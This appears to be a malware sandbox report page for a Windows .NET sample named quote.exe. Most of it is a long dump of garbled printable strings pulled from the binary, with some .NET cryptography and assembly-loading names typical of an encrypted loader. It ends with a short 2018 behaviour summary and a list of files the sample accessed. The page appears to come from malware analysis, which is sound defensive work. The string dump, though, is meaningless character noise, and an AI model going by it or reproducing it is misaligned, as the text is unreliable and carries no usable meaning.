zee4
ox^Ah1K
WYK'
gp4
8.5q
^Gl2N
\!3 {0J
jXZy
trRJ
]o$g
{ X/
Y`/: x
op,Z
=).H
c|r0
KS#<{
0 2`
XB}M
~yB_
Type
F*tk
74NV
1^&Ro
V _ @
b=J=
X +
$7S^g
P [( ,
K$.
>5TvJ x
?_qr
.Hm=
mlHX
/%oD=
<)9DA;
vrt6
66666666
B#It
6F|w
^;:
Pk%Y
#?Qt
fCie
:@*Pxo
tznC
hmQ[
P9''j
BSJB
?a$L
$='|
i[&Ab{#
G1E#
r|}=G
}On6
fl)t`
X_qk
RF^J
={lz
=Nb:N
~E$S
o07o
O}R_Ow
Dban9
Q|&W
o{d%
qgS]
GG(((
.>=,U
<RK>Z
si<(<,
8gfc
h= E
-ePl
= Ha
9 #`
EEEEEEEEEE
T]],
#I)
CD5w
NL\Y
DL ?
Nx#&
C6TI)J
<tLLU
xdmL#
qq iC/
Za+R N=
t V.
HgT }
]P r
/F'{T
j"U,
~oL3
/X<$2
Y18.
F_0
47E
vsz$
CA7u
1,WE
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
_4*?
( x^
GP' U
[!f+
Zg('<:
zy0T
CxSwp
* b$?{
!4Hb<I
hWDF
A@ZS#
aM>'n
=x! &a4
cwt7o
W$PC
_XT
@@/
?%=pl
8f;4x
M]Pw
4S]{
5a)1m
mscorlib
6H i&
H8]k%
aUO6
vr4\L
BiQ,W
U^S/
<:dR
A"#xg
URA08c
J:Wv
S$^n^
f ]E
e7v8
NeoE
i4wxk
7 ?00nnnn********-
A b"
4g~g
eFPUs$
~~~~~
KY`O
YKrLSD
j4[\
nlLg
C69HB
*{!>g)
l<wO,
W],I
:::::::::||||
k ;X
,QBW
zgn>
<_]s
"$HF
DHW9
~ .:{M)X%|
-[1
5,TP
/OfQ
QRS2Hd;
dsMk,
_)L
36:=)n
jPjO3
&EAhj8A0nf3U6tHubwzFT6KJQSuXukqMEs9Bwkx
f|"!
4`Dj
?Of
=^D;
(Ugt:
#6.J~W
[z`MA&
}|$C)
G ]6Lh=WM
T$}
"}I@>|t{ml
24?B
QQZ?#Ru
;fb&3
3Dvsi
d7i'9
0PJ
Y_5x9
q=#(
7?+Qd
kJvZ
y8le
{6"iA
svVo1D
}y0.
kP8_GK5
;;;;;;
t/G7
kmR4
OjL~
j~0R
7(t
9JoH
K8{|
EDf>
4/A<
MW2 dy
yFscF
0:oo$
K %br
Ym\Lw
.&HyP
L"VL
!Tx*I
tDb2
#TKfz
*|,xI
Wg+eF@Jb*s >
;.+7
vLg
&&&@@F X]]@]
{0V.
p*<%
{XpV
W"b`0
-]qb'
sSAy
BB S]]B]
6J"/
kFdq
u9Y"
7|U4g
?mGx
V::0
vOi+W
Jw-_A
1x`R
mshn
0E=4k4
E:Iz`&
T@?1
=hMW
B"N:
"CEC
<_>2
>wWyk
Zyc6IqzFzAXT58DqrDmxnK8qXq5L
W@*i
Qf)C
( Qv|`
c6:y
'Y~}
V5~Z(
Ta<5T
LoW(
NAT H
J,7<J
!GlG
69X
Cb>l
s VpG
rfR[
H~ /
X^(g
""""""""""
|t ?
:/C:
Kkt'
SSSSSSSSSSSSSSSSSSS
uWgQ%
b`2"
MHJdh V
//NN bnnnn
x4O
P~y:\W
cIio
ctAkI
p8q@~
XZ\3
{n6>
tOrP
cZ[Mf
xzf2
"nL
a/ G
]t c
/bp9
&j[1
93MtQ
RM<[!
A3l!
uLSh
e.kX
=d$\
Gh87
Vhog7x
#o4T
komR
oFJa
M7^+
R{Hor
rc3(
m:%xbe>~
"B\z
n z*{
WkO-uR2
U)m<
=B#
()Ule
nnnnN//NNNNNl
IX;n
AUAg
88:e
S~|
\^f+
IZ|2
_FtN*
.L/}V
G&7_
Dg H
Cid[
N%`/
lA)!
cJNt_
v^SR-
sXBja
Sw)
A0-(
%yrAU
D}y_
xDaG
'kh
oS57E
( u@O
EWm.4
x4>I
&x?%Y
z}_A
%rA~
@Kvn
`|T~
OVl&
&= H
t\rm
KmS#
0J
-Q+7
Ce1R
P1n4
?!&)4
[^R)
! rM
B)Bz
\v:)T
.v|W)\
l c
+R*`
m8EL
#{ T
B_BJ
)K:5
\oe^
gPP_
gII
!This program cannot be run in DOS mode. $
|yX`o
1],
8$y%
1902Bo
9Lri
?jZ
Q2}B
$X=$-
R:( 6
,) N<R7unQ
'JdQNro1NQZQHfjhn90tr6uEpubeMcTD12sTL655
H9`N
n-yv
k]AJL
FgyU
Vk ;E
ZS:a
pqLAo
sz/Y
$b8#
M8+0!
[gl p
wQ]j)
8H+}
D,Cv
F4P=
pEO
V_hkf
BBBBB
Hq9
|\@Otm
NLa,XlP
&B0O
:Lh Q
Ij;L
B$jQ
qO
XYl
AXo`
^8$z
v L3
X1Fy
LR}e
$|_4
nb[`KFe
#xM?
7EAb
V!S,
23|\
_&-\
,5n!A8
CT/!
r,5[U
]7n
8'\rGZ
E+u\
?%4d
/?3>
Ksqh
T;pDe
4_ljWu
sCzE
^ZDU
lv)y
8,p7 +n
HS%s
!i*>
ci[^t"is
on]?.%;
~&[D
h;u*w.
`H8t
' }y
]]]]]]]]]]]]]]]]RRR""""""888
=#(
9M`D
G;_R
)O_0V
iaJb{,
YcXnU
zoD*
|.GdB
[7Ci
7[&P
@)*5
%f.
a_tB
A?+[5t
eu?<E
dN>B
& '+
wS!$8u
RLr
5Lb
QcVo
!)bl
.oR O
nP-s
*Y!+qz
Z@,r
6k*r
i[d"
zh6ztvIOsgqXwsjMhBTQ
uH]a
Jcvu
=]]4]]]]]]]]]]]]]]]]]]]
D &>J+w
DB75
0$!K
c.6th
L~_h
On}d
i ? l
pt$b
h+<J
maIv
]W(8
sy(Y
3&o4
System.Security.Cryptography
{3;9
_Y{ <x
}*E
3PP/L
?^Nd
RN3@
]s4[
Q yP
jEda
nE>rLZ
[k*}K
9vN33
Fa]-
rMX~
Kpvf8l
qak)
5sY6
"R%
~Gt*
3Z>e
08=a
Pux3
*:5-
4$xV
[bnvj`|
zv$3
C's
f6FW&
p 9:
yUMu
%, 9
x^P/
l4)P
>pL}%
e,< }
SSSSSSSSSSSSSS
n>Vfk
_0e*
16`ba
8@!4zca
X3#~
6pEP
5 ~
>9FW:
<m8
TransformFinalBlock
8){9
A0?
5#6[
g1:d
90^r
=1_|
z={ {
-I(#
|*u|
6D!Y
EsgT
'D!;
RLr;
ir}D
m-uVN
?:P$
S_Rv7
GN| "Yb
N2P?
P@J$L
='4p
zAfxW
I <5
Goe^
m`e(%=
i0^2b
N;.s
d'["Y_,Innnn000000G^
;L "C`
R.mG;
cSM
+K?
:Uhc1
G8FSSP3mFd,nnnn
RijndaelManaged
zf!?
^w
3e.)
# =n
x[zkb3
5)6"
tN}{
j]yT
eJ2
/I4vy
(Gxv
=`)Cw
Tep]
KPWb$0
}dPOs
6E L6G_`
`Q/yN
u+lj9
/ov
SMr~
0& N
1q}Y/
j?vL fP
] '
,7 ]
!qDe
hF*v`(
Q 6(
/4Xf
" S1
9ZkR
G&,gl
s^k|
5L$A
d! J
HI9\
R2]
9mG@1
lwYF
m&p>He<
KFHfygT2pFn8LzM7GwnEaCY
CpvB
`N*0
i2(H
:2.s
^W~'[
}BJ>)
h-xL
w*
c 49H
B_N*
g[&%
NwEi>
wB?G&
|{T=,
O`B,!
i$9k/2
_jc9
y8$b
Z`D]
nS4+2
=g{ GO8 b
?W(>
2UN{t
i/A2
hofo
eVNo
E g@
X=;`
drqL
9,yE1
UO=V?
qTne
uYoZnl
!2_
1VS"4
k0\p
&KcDNS
>FH#\
b1r|
wr'C
BGMM
ExLcEV
c5d
v^o)
_qU]
q5#\
ETSn
o3p'
AAAAAA
dH XE
""""""""""""""
]W S
|W_g<
~-Ob
.em2J
V"1Xx
6Ka4iM0
[A5@
IW`o,=8>
F#Cr
<p~9
UO<
*DTg
_}OG
3[zI6i6
izj/
<f}0W8
USiP
s+j |
P3%1'v
MethodInfo
|Vmx
bU{<
D? p
p<4;%
9*Z $
E`WQ
UF\
x]LT
}T>#.}1
CompilationRelaxationsAttribute
bA)!
TVEG
$K!R|
+ oM
inYM
MeeDs
n?5"$W
U%F^
vOqb
mR9Upl8q3T8DYSyRTmWaF2rHcgK
[&~s
p&8
x<7[<
gHl`Y
?Abe!
j&UG
=gn
Hk)
Z6:
6p7c
lmk(
AAAAAAAAAAAAAAAAAAAAA
SSSSSSSSSSSS
$ XCq
jB'X
}+ci
xSDj2
8Xe0K=
35%H3;
rbl8
^Kte:
=sEdP
`J`m
wX"c$
^~A{
.Z9B
"]TW
`7]s
)QfxU
0$F
MDTp
A}r2os
7hX~
fU!p
@Ul!+d7
)?K^I
z)JI
9nn6
K ]b@
4&!wg
DS|s
_C&e
W.6x
qp_?
S. 4
8EOG
&DFpH
+%Po
k]q hy
System
Uq7t
\_ T
5M'd)
(PL G
EnnO
!/5j
<y8@C}6
M3"
v$`*
D74p
11O5
bCj#Aw
| 2V
T`'\
cbXQ
? _///m?
A>uG
@=>5f4Ny&
7JP
Bczw
m|x}{
9e]m
pBK8%
|P .
jyh*
AddMilliseconds
>R!]
T,&y?%3
z q
-6#<Z
0l6##Z
LGYaZUiGH3T8ySSbdvOBehH1nnL1U
EEEE
, 8jGy$
(cr
W0*=F
%6L Z]
n>#R
eZd.4
6)y!
#Dg&y
,(Zq
H#?6
}dP
u:d[
^<[I
D0h 7
sv~\
x]"P
F#o9^
)+ G#
A81u[!@
-V@\
UNC Sl
|iC $
06L6
5*2I
7#|pz'
kS$p
aijW
?@M;
ww8m
4B-w
MrJ
z _
H~D?
i9$
get_Message
<"^q
H(t[f
/ WT,
z~tP
<~ou
- 9M
iXD-
'\ W
IniK
A![
<arF~vR
N@T
U43K
qL2 x
!$$
>w{P
VY>H
foIX_II
=dnc|
,<8y
jo=
0'_$J
; Ic
g,)<
cKGs
SLW
^X~z
Exception
%*&o`
+; 0
8;~7
NQ p
u_sR
0iL"&
h5?k
R~B8%;
C#\
I7\
t"}#
dVdi
;IYW:G\
4J i
Xo5=
(X%=(%
>f;6
6M+
^~.!p
$5!8
Q+\
Y;7
;O/p
\6;^
*$oYD7
3v~0n
8{g
Wu2!
:n`,IU
r92l
J%R{
(QK#
ph3
za`'
g8]p
bT fi
-'R;~3
5][s
QL2/
@$C/
u*H5'%`
>%uc|
|N$0
`^gCU
vE/
%t e7
L c"
$N]E
2kx>
t;Ib4
9+ZrM( {
dS k
(U `
$b*****EE
:V/-
8_%:
GX}5
o Jq2
`A(`C
L+$I
)I r
[b 0
==
TK^?!
"5* -
!) G|
stXy
{?bOW'
F4r5<w
vR6LjJ
203]
System.Resources
'O-R
T/>1
Vr^uloR
Jl&2
ZRa
@CO~
V59z
/I>y
fVq?
"9(o8
9[4=Y
9T+v
+v M
LSl,
5g8B
3n,h
(LmC
vEUe
d!b5
r&J
. X
!TTpn
`l1l?
NfbR
E9PW
m S.
E??@
Oq,mE 5
^L vS{
(^ 2Tma
(35"y5C
=p0/4o56vUa
g"\V
#keT(
:>1\
'[F& _"
'T4G
t4RnR
n$N!
BLIk
$gYv
DO(J
eM
btO_
5 Z<`M_
)kBl_
X~nv
!(GN
7(X[-"
nlz&
~[bMT
"}~<
\K'?w
HB)_9
`8v
M2/
h> -e
%>H0A
(sDS}
q>>px6.
nU$
Zei
kF.'
3.?)
A5z!j
cghsGmKCARV7A8QaeucMqevq
ec=9
k?E
#)5r
Fz Q
.!2B
Ob4m
UK%L
,>mi
gd{J+?Y
E/W3WQ
b\Tt7
\= <
Show
``````(((((((CCC
3i6s
o>$]
VQRt
x
6S.W
[2e(b
?ony
*Gpc
qqT%
y~-3
-)GC?+
_d#&
R=Pj
]rH"P]e n
dEDl
' JS$
"bZI!
bnv4d9)
7?k8
POn^UJ
JJo7
r]
P<uo
m#ek
J,5)[g
{ +&L
`O]n
+\%Y3
?G $[`
di73
/=Hl
nRL k
66666666666666
_ed{
:[p&a
pIkM%q$
9g-.
>S%6
YtMMoV7WyZ1wEoBAZNFKwYaWwwMmLX6i
YS30 r
_CorExeMain
DaXErE
~zX#
sZ%{{d
8R~Z
N 'O5z
#}z%
z<L
uF{#
iR tYi;
(zE)~a
S39]#)
w+-n
1O^[
set_Key
:u@2
{Mv,=
#[K[
ldrk
rW^d
ki);
5jk[^
j+uc}
_ ~*ji
W^Mp
h ?w
jcSYy{
P(Z9Q
P 9z
NBeH
Z\wYs-
l|!/#e
#/pC
q4 VS
Ng^gE
A(Ab
mya5AAO5G425gtqIInkPzblxZ2MSBS
pW=U
i"Glz
J cA
@Q>GJ
0ON
2icM
R+&>BxIy
!4)v
43.D
::::
mY5v
Dkmv
CSD'
ToArray
ia56
,<B
xS`WE
5OrI
*uy@
nJ%&
;W}&+
$LiO
VEr"Q
IEnumerable`1
>k7&
ort&d
?CX5
Ylo%
&99Q
_7aF
:CHZ#0$#G
~lq~
R@ u
kCm2zJ
pdqfN
Qx-
:OzCw
!|#P
Y-2g-
R:~z
hapD
lHa9
`1d2
|Cq
2!t;O*]:"
l EYEB
g[@b
UG2Dk8H
0f1b
4p'P
oB6+
xUJF
kT#[
~%t\4
rU\M
[R`]V
m`Bm
m{e=
._U7
8sQU
CDq#t
Sr.=
ZC5g
@`K6-
$_WJ
(_?l
v1~M~3o
_ )(t7
j7zy
TtY
Load
L<e&Mk
Xz2/
?Q~lx)c`
:%I&x
3_M (
yM@;
17"o
E=tN
:V#7
wTO~
<P1.
4;D,
9<aq.
""""""""""""""""""
}\?F
]]]]]]]]]]]]]]]]]]]]]RRR""""""888
R{xc
~q'-
oGml'
rigz
'\o9
ePhy
UxCXxg
!06>!
STfb
.6iU
*sf\O$v
nnnn
c$59
*:j>
F?4S
=Gk%
W$AP?GZ5
8]Q
\M<P
CrVg
$d ^ P
_VVx
KiUx
{25S~0h
R)k;
L~TT
.n|R&
"Fqw)
SkipVerification
->j%
{c k
@Jo3
N$-4
gUH<o
5r0P
'2u+
9w_$
O.#}
oim8F
jF@O
2$^i
^wyF
\>6Fe
\T`_
4e5*h
[;\K<
]c+n'
m!M=
Yt]!
J{MC
b|x.
J:\t>N9Eg
;S
nfOt
]\G%
6<g=
bcor
::::::::
&&&@@F X
%h+e
\0 k
(tQD
U:*
lv(n
!&>u
&d~^<c
F8bF,
r_ok^
DQCgyV
28T9
3=88e
S'60
yb5]
#Uh$
:tqR~
pv$Av
qg1T
SE~g
_gi]8',
RS1\
\'rF
%pNx
dY@D_6_
Z?}
D&)0p
W|_# $6:
YCfr
*??>
F*#X>
haT
XXF(Vr
VaqYb
sp}yM
#H}r$
)>gd
'2mJ
`FHv
Wc>}
L )m
u@p`
V.m0m Z
iii22nnnnddZ)
Object
[: u35
c6rL
/W3{uD
&;Lr
9bhj
|WU| D
zG$&
<TzJ
/]fD
hl _
1 2yr0
50.[
w;a2
X]+q
Au+U
0g.'"
~ i4C
922~~~~
nMJI
r7
QS&D
GHez"
i|l$&
x" m
Ggw
QR!Qu
!W$5
uW*
5o9c
:K 5
4,k8;
*)v<
C7+^)/
)^LI
7rX!
>dy
`EcI
ai(A
r Zt>
o:fh
[8=E
^#Z/B
{6vD
k&ri
guy#"
DPN!t
7fI xf
RRR""""]]R]X)
NJ z
.{ome
hHq!
hCa>h
>iHr,#
,6
i9&k
OC5z
3.gU
""""""""
vU~$
<_M8~
C6Gq~
8t5W
Bj'a,
DIfX+
'2`hP
iNf\
9Q0Pa%
Uk:"
)60{
'zyC
/uN5
!Gm2
^TN)
| >^
e,s)
;NCz
P de7~\
At+f+
rftQV-
@GaQ
IalH
^Y# :he
0k 1CC4
fKMy
E|?K>
Rz"B
3;.4W
w_zBZjMf
^jKCg,
&nOWlf
yd1
jGXg
y(st
R}^oG[
xWskg
* P-8^
]R0^
7x5PV3
RH
SAlVg
dlzD
fUhb
&@{He
_$#j
G)R/j
B*5w7k
( (*
QtM#E
r^:g
yHbc
wRn"
keuc'TT
X}O}
u].2
0A7TALL JJ]]
W |DD
>@TUL"
cBe|
#EwC^
jRft
,8{p
\+j)'GU
v<GI
`q\^bL
MF0
=+j
RuntimeTypeHandle
F;_K
o0!\:
v'Zx6
f|0-
5|:9m
K\_r(M
Uit.K
r1)FX
DUXCG
MBVB
pN
sH(IHi
*vTP
]#43U
b <'@
:R sz
XDb<9
x&{O
u{@ `
oIi9|
=O!Hi
vIqU
95Mbs
Gb%s
} nH^
>R 0
: yYt
R"+RK
sz R
OhET
|.7<
iy|C0(VU
=KRa
F>Yw
:EnS
A&u,>
bMF
yWk#s}
HTU
HeC9H
CpKU;
/% 2
/)gB
c!h}
3Y)U
=ZF
/z[,
*lC/z
Y?X9*
F k~
K^l#G
5bQY7
"]{ t
eX4;t
mS?u
_`b cE
} [6vf
Iw\*!q
VA{R
nk%<
elu4
$PPTg
Y LWB
7K yA
V#wCj
bPTe
)td
Q!61@
kc_8
4dZ
(s<J
V$N*
/=QB\
g lZ7
L*wi^
=*cy
P F6
Q6I
PTs1
_)y"rP
NSY9
pt'
c8Pr9
V 3,
]]I]@@/
BYYy
F+X/
GR|
>`cSL
)-Up4u-
YBRc
d`%8
S!b:
\G=I
: Q'
SNa
RNM-
!GR9
6dA4
HY.&Kt
W7Csm
tPP
ef,B
)'7<
B@iv)`
Ks:C
T# P
a9O C
JA5vEP
~sd$
GU>e%
||||||||||||||||
HUi).
jO Guo
I-*z
s w8
nk)t
w$F$
P[^m$
P?0a
iaW|
f6k*,
@fpt
mhE _Q
0TNz
-RVF
@60
l^Nx
\2o U?
WCp
*"j=
\DX
dXL0
f]W
@@@@@@@@
%QRP
-&NDF
l=x6
U;X1
I39uh
E\G>[
``nnnn
"h:m
uR ]
c*QcN/
Nu#R'
~/,f
SSSSSSSSS
gyRl1
T`iS
49wbf~F
v7c.bG
LO|U
x,O<A@
\YL/
Rdl
r}A6
6?'qPq
{/Ap;
+u9Ld
zSVE9
;e+N
b< K
%vue
[J}s[
:B\q
9#eL
.MRCF
^1[s
7Ro]
GxjK
c.B4 Kj?
~$s5
Jy^O"
+L~%_
,r<'
{uDD
!{E~
cc;T
o@|
b4MT
_>"A
Yc{bU_
0(0*
W^*eTY
q- L
Cd3.
%@rU
I]4[
x j%
:M!h<m
!"3$
_x~YH
2222~~~~~~~~
fLH"`
\Q!t
I:1 K
P2;L
:s J
Jb 2f|
';DJ
r.91
'--|
0NJ|
qtN|
~9JVO
3PZJ
#qHKv
B@a
_!3 ,x
gp@~
V$At7N
A4SY-
D +f
IN1/!P
)9Hs
?kV(
[jJ!Cyx
m?0m
Z2E5
`^,nZ
'$::
nnnnTTT&T
a=^A
joz7
>-]O9
eQ Pu
GB^~#
vnOi
5E l
3~-|
PD{9
0qHw
E.}*
WP>\m
{KI@vo
"@`
[hNJuq
\]@i
Bwxx
Cl4
SD1
^jiBu
:t@+
-mZW2
3 *]<t
jH*meg
>ASi
;-$6
hMQ u
AyL0
8 ^k0
+ }+\4,~
U t|`T
#!5L}
rv^e
p'H^
]]rau&wPkxn
#xWDL=
`34:
TKUh
C=kK
&Od%ymk
Rdn|
%I)d
%1J~<
EdG#
u8l{R6
v2.0.50727
9v`\
)ObdT
=Nd]@
@_F.8
pjlC
ld5;"
\Q
(P[+
x/i
~aA|
otNb
eKQx
EjR=W
8jQZU
vVZM6H
z7#B{
K'?;`
CreateDecryptor
;cuE
-:%[m#
OITp
w{X_
*SE"y^aP
5 ^^
KI`)
}{H&
AEDw
;4 (
aj76]`
>kRI
++5SN
,qA
F7oa
)e#]
yYaMr+
\Yf3
I2s[z
D845
nh <
&IM
?;yR
~QS
4D)e
F27B
8 XS
rAp^
jw#E
l%y
ttc^
k6!:
6D l
+8e<
^#nmR,
g"uc
xX_|
0DT*
ZJw$K
auNx
$efJ+
zG?R
4lBo
;;;;;;;;
Gi7wQXBwgmUTmFsVur0kCOg.resources
2$b<
:/W^
<H#P #
3HQ
Qk !
@@@@@@@@@@@@@@@@@@
%U`7b?
1}y
<BJ
tQ 6
GetTypeFromHandle
ZiyW
]@cM
q/?d
wgVz1
811U
&e %
c;S3U0
vPi0
'lFi
qiUz
B- m{
oJ(
xDV-ox
,HzD
ZkN0g
VNX,
o7Q }
X/7D\
PT'2
@8@]
$@wl
oKNx
dTn/
veKt
&?(!J
C`q]^1
*Yp%
NzW^
h dR
v\D)O
G{s?A
sip{
$;\lN
':Hk
LM26G
2ZwY3
6mT6U
g<}mw2
^@E
=Y>
# ##
;;;;
;N4Q
QqK6
%wt~M
^nTD
%cGw
-% >G
]R+v
,v$
NojI
{<:u
Nz"U
}p\w
yB4@
ew'c
/Y9
nbW%
h.`CE
ZNc<
`~m!z
9mD [
L24xk.r
R6I+-
s*s ?{P=
Q ug
e>O
[I'
CHr
&o#%Kd
M(wK5l
v0h6D
k/+W_
!ZkL
:R-\W
/ <C
vh t
HloE
/G5m~z
Cmu[
pLUQ
!iiii222222TTTnnnn,,
E[I1W
V`{J
,^kw
@@@@@@@
[vO^
WK<f
IlxqV.|qd
|ed#
+[Vi
r>oh
S/@kj,
O6@Yp
(c[j
?F[4`
r 7Y
Bhq
W 0~
}@lIO
QnC
&.Bip"k
4PVr
`V%q7S
Sc}y;
&q:U
"1*@i
XXX))))I]]X]&&
^NBs
y5z\
6"/*
0:Yf
{75i
K6==Y.
?RNB
2 >a`
u!t&\p
bJ1~
S_M s
*~gs
#)\iZ
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
KKC]
>5&(6
avSt
{T .?'ZA
0 LkF
\wgV
Wm-<s
ci*XfZ)K{
=U`|
ZZ`.
(5H>#
/zyP
q&#`:
?75Y
?&Iqd
YezD2
r,7/OVn
*'qYz5
*H.F m
C6P_
ce'P
ftiT
))))III
bSqj
9^(
3)T$
"wt~Z
OjWu
(([}
i<(H
wm#"@
"52[
^@X9
w}8
6666C'J
G0a4]W
Hq10rX8^] h
}aS
.(F/
r2o0#
`P{N&
Xt1s
okTd
oB?V
sUf^
?U"p
fUR_e
$-m.
jo1mg1XP67tgvMdLkxBa3
v"Wz
Z^j,
|Jr;
)WjN!
` uUp
}LL-I9
%4BV
]5|d
W!?
IHy7
&FQ w
Ne_e
FY }
{VIJ
(Em
hfff
Ox&j'J
4Zn1
~6HW`H
tFk
)al*
H;y>
43SU
HEQ[
n}"
DWV9W.
>-qJ
`$3W
*z w
%#@4
Kfro
'@J$
hftRm
2whT
[y6M
M9E=
DuT
N Gs?
]:::::
'3 ?
gae{H
6666666666
-P7'
\#
\#`s
NrO/{Z W
!ozd
%!>BC
{ypA
l]6L
=Ly]
Vk uh
{mV0
^dQ|X*
YJDkw
R5 v
d0P?
E5d;
CY?g
jraH
%]"~[
]njGZ
Mb1
[c~d
2 6c
y<zg
_+.?
pEL=
ePFKSS
.RhG
H w8
Z;A#H
4FqP
y0bv
"<gK!;
qH?!
;O0j
XOo\
z yh
h;Y
Fn+R)
"-TMUF
ME#=1
]0p2
]{zf
?K(%
U R
.gDM
.i'l
v$h!
t(
iXV1
,KP$I3
N}q3egU
]A{n
~U 4q
^zAs
/pv=//
H/;C5KW
p^+^
Wy "
4.$
F#Up
07K%p
_bve
m{pO
et1H
Lzwm
#I!v
//O;w
"$2tI
Y=iR
!J .
7QGn
L$jF
%?2p-
T</YG
sd4Ah
U< L
MP
3c1&
*r}
B?J
% U'
: wuK9c),
},hd
3lw?s
k!@F
&qd
)~?E
g7xj'
<0P3d
>B\M
/ N[
CC j
uB5`
Pst(
ixRX
pha~
^#ia
Ii'q
C4~4
-CaS
cMa_C
sfv
04m7
R+Qd
QKB
]]:]BBBBB
eFpS
@g]`z
"3 mL
C{Yoy
W4&xO*R *FF*
(N+9
M .XOA
4u y-9
c%J%
MV Z
P1wt
mTQ
9SlE
~[Z +-Fx
8x
rr<a
'o)&
BE`&
Z 46
_\Rk
YD8a
DMdnJ
^)`
js9~
: _V
dtk7=
Gp\ 3,
M $:9
=uT)q
wf%g
)q>P{
$Q})
$Qd B
`vopkZ
+3o'^
")uEb
Veh}0
3TFc
v9o{
|ZD(
tVH%x
/0Xi`
6~8S
z I8
nS&
8Jp 8
&?Mk
b&z>
M,OX
8IU[y
tYAjCH
S<_m
Wvis p
1Hy3
_.Le
get_CurrentDomain
P1T!
9?V-cj
U3YP
;ftr
Px$W
H,b"q
3tuy
!3<4Y
K_'f;
itC`
:x38
{[7/
/ H;
k u"^
fs?C
Gs!
_vKMI
&<66
h1 ^
(/ Q
--=Y
CA=?
cnCS
Ju&1
Qtw
,%|jc
O7?ph
`! R7
vhLl.!
y9 #
My[
Lwy5Q
m6<Cc
NJn#
ePeB
YCg
&*3a
ObAi,
-%v6N
/4 zI
K$0
, B@
=ox1I
V;'|
w4-c
q.fS
"T5IA
DJx}
#g,y
&z|(8
< tE
=:0r
Qc
HHLG
e9eiWHmJBUbbXZnIafXch
J#9 L
N*_%
nG\?
n|6}
!uo"
1Tr
# C-b-
@@@@@@@@@@@@@@@@@@)QeQ)
fFI7
]4U}
LXw'
>x/0q
m/Df
LW~i
Tm=b
R0$<
FF6A
Tcok.
MvZ"
s/C8
tMAoTZ
w^&c
j|/#Q.
U5u|oj
4 w<^A:#W
[kq0
U;>y
BQ[r
%Y /
u{gK
QUTBQ*
CxRw
*/25
APWZf
SyI*
0n"%
EEEEEEEEEEEEEEyyyyyyy
*~;:S)
b1+K|
eo:$r'
y_YI
= u
j2p~
u,\;^
A{Br
) 0_i9
;rU}
IG
RFm\
hF1,u
@{!!,
jVzH^A
E3,
ca}t
%'5oF=Q$
K1
~L8rj
9U?-@Cs:@'
2g_Q
BNw/
L"[[:)z
xr1(
BB S
3!NY
@nl$!^
!~_/
2a"a/
```(((((nnnn22
7y3q[*
'B{"
!/u
C7y _
pYDZ
iIZGi
<CHE
l"Adz
v[|H
{K]0^t
SSS .SSSS
Pq*AHz
;xb>
<4v
i FH9w
System.Collections.Generic
Z$mwx
/_sS
xtP#
xIyR&J
KmY.
-1zy
gs%|phz(vD[
H:gX2
l!&Htp*
rXt2tuKBo7lugScFx17PH
Mz~T
'p58
}a 8
SNZV
#uBhogscM3gGzFfr8JqZMQgXO72O4nw58WVe
ejs 3}v
System.Windows.Forms
WxEY^
*L*;8l`)F
G 0Q
J$J+n
sm v
_RG;
O*=4
"N.F@
qW&(
~SP n
Vj,7
]]]]II
Bk8Y1
l F(
=,qHn
:3$I
+/;y
#M2o:nS
uTMX
zD8` 8.*z
jK8/
_r'!
5JC*
KN^"
f`hauvI
7 KfF
HIOO`.
f ,2
[H^K}
D3dd
$!QA
gv%h
?%Fr
PG`g
)8\V
!0 a
/:]\
/oO+Sj|
w\}5
#GUID
ff+ Y
7@@@
%B6 3
}y+
a; ?[
U?8 ]
yb/Edt
$|'}<F+]J|t
3zsA
(.4b
5uz)BG
$N!7$
>rC_
ZPMM v.
7~qh
u?k+
*YU[
m10`
_0jagj
a]fD
,Slj
mf-e>
YAs_
G("
NDMq
+5a<G
Ucd0
cQ46
y{V'
'Bg*
W0VNF
d.ij2Zm
)R(Q
>sW|%
66wk['Q
xADN[G4
-CRl
eqm
(=T"
~C$
z\Ji
>Agz
#rL
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven06_64 Seven06_64 VirtualBox 2018-06-06 19:54:58 2018-06-06 19:57:50 172

6 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven06_64 Seven06_64 VirtualBox 2018-06-06 19:54:58 2018-06-06 19:57:50 172

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\quote.exe.config
C:\Users\Seven01\AppData\Local\Temp\quote.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\quote.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
